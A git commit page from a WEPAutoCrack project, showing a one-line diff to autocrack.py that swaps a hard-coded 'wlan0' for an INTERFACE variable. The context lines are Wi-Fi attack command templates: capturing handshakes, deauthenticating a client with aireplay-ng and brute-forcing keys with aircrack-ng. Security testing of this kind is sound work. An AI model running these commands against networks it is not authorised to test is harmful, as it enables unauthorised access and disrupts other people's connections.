aboutsummaryrefslogtreecommitdiffstats
path: root/autocrack.py
diff options
context:
space:
mode:
authorLaurent GHIGONIS <laurent@p1sec.com>2012-08-06 15:32:15 +0200
committerJason A. Donenfeld <Jason@zx2c4.com>2012-08-06 15:32:15 +0200
commit6e307465547db9f7f0597bc98f57ffe6ca494ee5 (patch)
tree4da7d73fd8e6eb1f2dd345cc65572f87837d60d3 /autocrack.py
parentWPA2 detection. (diff)
downloadWEPAutoCrack-6e307465547db9f7f0597bc98f57ffe6ca494ee5.tar.xz
WEPAutoCrack-6e307465547db9f7f0597bc98f57ffe6ca494ee5.zip
Replace hard-coded string with variable one.
This fixes a small typo where wlan0 was hard-coded into the source instead of using the template variable INTERFACE.
Diffstat (limited to 'autocrack.py')
-rwxr-xr-xautocrack.py2
1 files changed, 1 insertions, 1 deletions
diff --git a/autocrack.py b/autocrack.py
index dd046f3..1839845 100755
--- a/autocrack.py
+++ b/autocrack.py
@@ -102,7 +102,7 @@ aircrack-ng -z -b BSSID output*.cap
airodump-ng -c CHANNEL --bssid BSSID -w psk INTERFACE
== Deauthenticate Wireless Client ==
-aireplay-ng -0 1 -a BSSID -c CLIENT wlan0
+aireplay-ng -0 1 -a BSSID -c CLIENT INTERFACE
== Brute Force ==
cat /usr/share/dict/* | aircrack-ng -w - -b BSSID psk*.cap